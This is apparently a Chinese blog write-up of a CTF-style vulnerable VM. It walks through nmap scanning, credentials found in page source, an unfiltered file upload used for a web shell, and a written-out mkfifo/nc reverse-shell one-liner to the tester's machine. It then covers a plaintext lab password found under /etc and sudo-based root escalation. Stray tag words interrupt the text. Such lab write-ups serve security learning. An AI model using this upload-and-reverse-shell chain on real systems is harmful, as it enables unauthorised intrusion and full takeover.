参考个人这篇文章https://www.cnblogs.com/A1oe/p/12571032.html
更改网卡配置文件进行解决。php
找到靶机
nmap -sP 192.168.146.0/24
nmap -A 192.168.146.149
html
扫描到的目录到访问下,访问/flag目录拿到flag1
而后访问http://192.168.146.149/admin_area/
显然
sql
可是看源码能拿到用户密码和flag2(卡了好久,一直测登录那里有没有sql注入。。。)
shell
上面已经拿到了,再也不说了bash
admin登录进来,文件上传,无waf。
ssh
可是无回显路径和文件名。
3d
目前思路:增强目录扫描强度,将文件上传目录扫描出来。
bp的target目录扫描配合爬虫,能扫出更多目录(bp真香
code
扫到两个文件上传目录
orm
访问一下http://192.168.146.149/uploaded_files/normal.php
发现解析,直接蚁剑连上(nomal.php是我上传的文件名)
htm
flag.txt是空的(无权限),看看hint.txt找到flag3
hint.txt让咱们找到technawi用户的密码来访问flag.txt,那接下来就找文件。
在这以前,为了方便找文件,先反弹shell
渗透机:nc -lvvp 4444 靶机:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.132 4444 >/tmp/f
接下来找technawi用户的密码。
老规矩先进/home/technawi目录下看看,有几个文件分别看看,或者直接grep -r 'tectnawi'
,并无什么发现
根目录grep -r耗时确定很是久,因此挑一些可能有密码的目录一个一个来(/var/log、/var/www/html、/proc、/etc)
最后在/etc目录发现惊喜
看看credentials.txt的文件,发现flag4和用户的密码。
username : technawi password : 3vilH@ksor
拿到帐号密码直接ssh连上去。
靶机只有五个flag,最后一个flag应该要提权才能拿到,因此接下来进行提权。
以前看到.sudo_as_admin_successful
文件,应该是个提示。
因此sudo -l看看sudo权限。
ALL。。。
直接sudo su root
成功提权。
难怪这个靶机叫CTF。。。脑洞和某些CTF比赛同样大。。。 本身找目录可把我整惨了(字典太lj),最后仍是bp大法好。 提高为root过程不说了,实在没什么好说的。。